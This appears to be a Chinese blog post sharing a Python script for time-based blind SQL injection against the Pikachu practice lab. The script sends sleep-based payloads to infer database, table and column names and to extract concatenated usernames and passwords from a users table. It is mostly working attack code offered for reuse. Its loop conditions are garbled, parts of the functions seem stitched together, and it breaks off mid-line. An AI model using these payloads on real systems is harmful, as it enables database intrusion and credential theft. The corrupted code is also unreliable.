python实现sql时间盲注

以下代码可自用，未经许可不可转载

#!/usr/bin/python3
# coding=utf-8

"""
functions for time-based sql injection(blind)

:copyright: Copyright (c) 2019, Fancy Xiang. All rights reserved.
:license: GNU General Public License v3.0, see LICENSE for more details.
"""

import requests

url = "http://192.168.101.16/pikachu/vul/sqli/sqli_blind_t.php"               #有可利用漏洞的url，根据实际情况填写
headers={ "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36","Cookie": "PHPSESSID=7qgjcq21lsq834acodn0mo7km3",}    #http request报文头部，根据实际情况填写
 
keylist = [chr(i) for i in range(33, 127)]                                     #包括数字、大小写字母、可见特殊字符

def CurrentDatabaseTime():
    n = 10                                                                      #预测当前数据库名称最大可能的长度，根据实际情况填写
    k = 0
    j = n//2 
    length = 0
    db = str()
    while True:
        if j>k and j3:
            payload1 = "lili' and  if(length(database())>"+str(j)+",sleep(3),1)-- ss"           #所有payload根据实际情况填写
            param = {
            "name":payload1,
            "submit":"查询",
            }
            try:
                response = requests.get(url, params = param, headers = headers,timeout=2)     #本脚本根据GET型注入编写，遇到POST型可修改改行方法和参数，其他所有函数中同样
                k=k
                n=j     
            except:
                n=n
                k=j
            j=(n-k)//2
        elif j-k==3 or j-kk and j3:
            payload4 = "lili' and if((length((select group_concat(table_name) from information_schema.tables where table_schema = database())))>"+str(j)+",sleep(3),1)-- ss"
            param = {
            "name":payload4,
            "submit":"查询",
            }
            try:
                response = requests.get(url, params = param, headers = headers,timeout=2)     #本脚本根据GET型注入编写，遇到POST型可修改改行方法和参数，其他所有函数中同样
                k=k
                n=j     
            except:
                n=n
                k=j
            j=(n-k)//2
        elif j-k==3 or j-kk and j3:
            payload7 = "lili' and if((length((select group_concat(column_name) from information_schema.columns where table_name = 'users')))>"+str(j)+",sleep(3),1)-- ss"
            param = {
            "name":payload7,
            "submit":"查询",
            }
            try:
                response = requests.get(url, params = param, headers = headers,timeout=2)     #本脚本根据GET型注入编写，遇到POST型可修改改行方法和参数，其他所有函数中同样
                k=k
                n=j     
            except:
                n=n
                k=j
            j=(n-k)//2
        elif j-k==3 or j-kk and j3:
            payload10 = "lili' and if((length((select group_concat(concat(username,'^',password)) from users)))>"+str(j)+",sleep(3),1)-- ss"
            param = {
            "name":payload10,
            "submit":"查询",
            }
            try:
                response = requests.get(url, params = param, headers = headers,timeout=2)     #本脚本根据GET型注入编写，遇到POST型可修改改行方法和参数，其他所有函数中同样
                k=k
                n=j     
            except:
                n=n
                k=j
            j=(n-k)//2
        elif j-k==3 or j-k